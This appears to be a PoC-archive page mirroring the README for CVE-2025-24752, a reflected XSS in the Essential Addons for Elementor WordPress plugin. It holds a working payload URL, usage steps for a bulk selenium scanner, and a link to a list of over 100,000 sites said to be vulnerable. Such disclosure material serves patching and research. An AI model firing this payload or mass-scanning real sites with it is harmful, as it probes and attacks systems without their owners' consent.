Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24752 PoC — WordPress plugin Essential Addons for Elementor 跨站脚本漏洞

Source
Associated Vulnerability
Title:WordPress plugin Essential Addons for Elementor 跨站脚本漏洞 (CVE-2025-24752)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Essential Addons for Elementor 6.0.14及之前版本存在跨站脚本漏洞,该漏洞源于输入中和不当,可能导致反射型跨站脚本攻击。
Description
Hi, I am Chirag Artani. This is the POC of Reflected XSS in Essential Addons for Elementor Affecting 2+ Million Sites - CVE-2025-24752  
Readme
Please do not harm sites, FIX it ASAP
targets vulnerable 100K+ probably affecting for XSS https://nt.ls/AkTE9 (can download by one click all vulnerable)

##### Requirement to run poc.py, Install -

```pip install selenium webdriver-manager```

##### Usage 
```python poc.py targets.txt```

```For bulk it will take time but yes it is going to confirm the XSS, it works like browser, so yeah until XSS pop-up it waits to see and confirm.```

![image](https://github.com/user-attachments/assets/4167280d-787d-45cd-81eb-4a5c25368885)

#### manual POC elementor XSS 2025
 ==> ```https://target.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1```

 
![image](https://github.com/user-attachments/assets/50d75f05-1392-4acf-9889-525e54ca5128)


Note: My script works slow, but it can 1000% confirm XSS bug unlike nuclei or httpx. I tried all the things, version below 6.0.15 are affected.

#### Information & reference 
https://patchstack.com/articles/reflected-xss-patched-in-essential-addons-for-elementor-affecting-2-million-sites/
The Essential Addons for Elementor plugin suffered from a reflected cross-site scripting (XSS) vulnerability. The vulnerability occurred due to insufficient validation and sanitizing of the popup-selector query argument, allowing for a malicious value to be reflected back at the user. The vulnerability is fixed in version 6.0.15 and has been tracked with CVE-2025-24752.
File Snapshot

[4.0K] /data/pocs/7c40ea5190254c4ad71427b745589bc0cb4271b4 ├── [6.0K] poc.py └── [1.4K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.